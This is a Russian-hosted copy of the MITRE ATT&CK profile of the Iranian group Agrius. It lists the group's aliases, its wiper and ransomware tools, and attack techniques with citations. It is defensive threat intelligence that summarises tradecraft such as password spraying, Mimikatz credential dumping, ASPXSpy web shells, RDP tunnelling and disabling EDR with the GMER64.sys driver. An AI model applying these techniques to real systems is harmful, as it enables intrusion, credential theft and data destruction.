Cервис управления информационной безопасностью
Cервис управления информационной безопасностью
Поиск
Вход Регистрация
MITRE ATT&CK - Преступная группа Agrius
Риски
Каталоги
MITRE ATT&CK
Преступная группа
Agrius
Куда я попал?
SECURITM это SGRC система, ? автоматизирующая процессы в службах информационной безопасности. SECURITM помогает построить и управлять ИСПДн, КИИ, ГИС, СМИБ/СУИБ, банковскими системами защиты.
А еще SECURITM это место для обмена опытом и наработками для служб безопасности.
Подробнее
Наш канал

Agrius

Agrius is an Iranian threat actor active since 2020 notable for a series of ransomware and wiper operations in the Middle East, with an emphasis on Israeli targets.(Citation: SentinelOne Agrius 2021)(Citation: CheckPoint Agrius 2023) Public reporting has linked Agrius to Iran's Ministry of Intelligence and Security (MOIS).(Citation: Microsoft Iran Cyber 2023)
ID: G1030
Associated Groups: Pink Sandstorm, AMERICIUM, Agonizing Serpens, BlackShadow
Version: 1.0
Created: 21 May 2024
Last Modified: 29 Aug 2024

Associated Group Descriptions
Name Description
Pink Sandstorm (Citation: Microsoft Threat Actor Naming July 2023)
AMERICIUM (Citation: Microsoft Threat Actor Naming July 2023)
Agonizing Serpens (Citation: Unit42 Agrius 2023)
BlackShadow (Citation: CheckPoint Agrius 2023)

Techniques Used
Domain ID Name Use
Enterprise T1560 .001 Archive Collected Data: Archive via Utility

Agrius used 7zip to archive extracted data in preparation for exfiltration.(Citation: Unit42 Agrius 2023)
Enterprise T1110 .003 Brute Force: Password Spraying

Agrius engaged in password spraying via SMB in victim environments.(Citation: Unit42 Agrius 2023)
Enterprise T1059 .003 Command and Scripting Interpreter: Windows Command Shell

Agrius uses ASPXSpy web shells to enable follow-on command execution via cmd.exe.(Citation: SentinelOne Agrius 2021)
Enterprise T1543 .003 Create or Modify System Process: Windows Service

Agrius has deployed IPsec Helper malware post-exploitation and registered it as a service for persistence.(Citation: SentinelOne Agrius 2021)
Enterprise T1074 .001 Data Staged: Local Data Staging

Agrius has used the folder, C:\\windows\\temp\\s\\, to stage data for exfiltration.(Citation: Unit42 Agrius 2023)
Enterprise T1562 .001 Impair Defenses: Disable or Modify Tools

Agrius used several mechanisms to try to disable security tools. Agrius attempted to modify EDR-related services to disable auto-start on system reboot. Agrius used a publicly available driver, GMER64.sys typically used for anti-rootkit functionality, to selectively stop and remove security software processes.(Citation: Unit42 Agrius 2023)
Enterprise T1003 .001 OS Credential Dumping: LSASS Memory

Agrius used tools such as Mimikatz to dump LSASS memory to capture credentials in victim environments.(Citation: Unit42 Agrius 2023)
.002 OS Credential Dumping: Security Account Manager

Agrius dumped the SAM file on victim machines to capture credentials.(Citation: Unit42 Agrius 2023)

Enterprise T1021 .001 Remote Services: Remote Desktop Protocol

Agrius tunnels RDP traffic through deployed web shells to access victim environments via compromised accounts.(Citation: SentinelOne Agrius 2021) Agrius used the Plink tool to tunnel RDP connections for remote access and lateral movement in victim environments.(Citation: Unit42 Agrius 2023)
Enterprise T1505 .003 Server Software Component: Web Shell

Agrius typically deploys a variant of the ASPXSpy web shell following initial access via exploitation.(Citation: SentinelOne Agrius 2021)
Enterprise T1078 .002 Valid Accounts: Domain Accounts

Agrius attempted to acquire valid credentials for victim environments through various means to enable follow-on lateral movement.(Citation: Unit42 Agrius 2023)

Software
ID Name References Techniques
S1137 Moneybird (Citation: CheckPoint Agrius 2023) Embedded Payloads, Data Encrypted for Impact
S1133 Apostle (Citation: SentinelOne Agrius 2021) Scheduled Task, Deobfuscate/Decode Files or Information, Clear Windows Event Logs, Execution Guardrails, Process Discovery, Data Encrypted for Impact, Data Destruction, File Deletion, Disk Content Wipe, System Shutdown/Reboot
S0073 ASPXSpy (Citation: Dell TG-3390) (Citation: SentinelOne Agrius 2021) Web Shell
S1135 MultiLayer Wiper (Citation: Unit42 Agrius 2023) Scheduled Task, Embedded Payloads, Disk Structure Wipe, Stored Data Manipulation, Timestomp, Clear Windows Event Logs, Indicator Removal, File and Directory Discovery, Disable or Modify Tools, Windows Command Shell, Data Destruction, File Deletion, Inhibit System Recovery, System Shutdown/Reboot
S0002 Mimikatz (Citation: Adsecurity Mimikatz Guide) (Citation: Deply Mimikatz) (Citation: Unit42 Agrius 2023) Security Account Manager, LSA Secrets, Credentials from Password Stores, Security Support Provider, Rogue Domain Controller, Credentials from Web Browsers, Private Keys, LSASS Memory, Golden Ticket, Pass the Ticket, Steal or Forge Authentication Certificates, Account Manipulation, SID-History Injection, Silver Ticket, Windows Credential Manager, Pass the Hash, DCSync
S1132 IPsec Helper (Citation: SentinelOne Agrius 2021) Encrypted/Encoded File, Data from Local System, Time Based Evasion, Modify Registry, Indicator Removal, Process Discovery, Exfiltration Over C2 Channel, PowerShell, Lateral Tool Transfer, Windows Command Shell, Clear Persistence, File Deletion, Web Protocols, Visual Basic, Service Execution
S0590 NBTscan (Citation: Debian nbtscan Nov 2019) (Citation: FireEye APT39 Jan 2019) (Citation: SecTools nbtscan June 2003) (Citation: Symantec Waterbug Jun 2019) (Citation: Unit42 Agrius 2023) System Owner/User Discovery, Network Sniffing, System Network Configuration Discovery, Remote System Discovery, Network Service Discovery
S1136 BFG Agonizer (Citation: Unit42 Agrius 2023) Disk Structure Wipe, Compromise Host Software Binary, Inhibit System Recovery, System Shutdown/Reboot
S1134 DEADWOOD (Citation: SentinelOne Agrius 2021) Embedded Payloads, Disk Structure Wipe, Encrypted/Encoded File, Deobfuscate/Decode Files or Information, Masquerade Task or Service, Account Access Removal, Data Destruction, Service Execution, System Time Discovery, Disk Content Wipe

References

  1. Microsoft Threat Intelligence. (2023, May 2). Iran turning to cyber-enabled influence operations for greater effect. Retrieved May 21, 2024.
  2. Or Chechik, Tom Fakterman, Daniel Frank & Assaf Dahan. (2023, November 6). Agonizing Serpens (Aka Agrius) Targeting the Israeli Higher Education and Tech Sectors. Retrieved May 22, 2024.
  3. Amitai Ben & Shushan Ehrlich. (2021, May). From Wiper to Ransomware: The Evolution of Agrius. Retrieved May 21, 2024.
  4. Marc Salinas Fernandez & Jiri Vinopal. (2023, May 23). AGRIUS DEPLOYS MONEYBIRD IN TARGETED ATTACKS AGAINST ISRAELI ORGANIZATIONS. Retrieved May 21, 2024.
  5. Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.
Навигация

Мы используем cookie-файлы, чтобы получить статистику, которая помогает нам улучшить сервис для вас с целью персонализации сервисов и предложений. Вы может прочитать подробнее о cookie-файлах или изменить настройки браузера. Продолжая пользоваться сайтом, вы даёте согласие на использование ваших cookie-файлов и соглашаетесь с Политикой обработки персональных данных.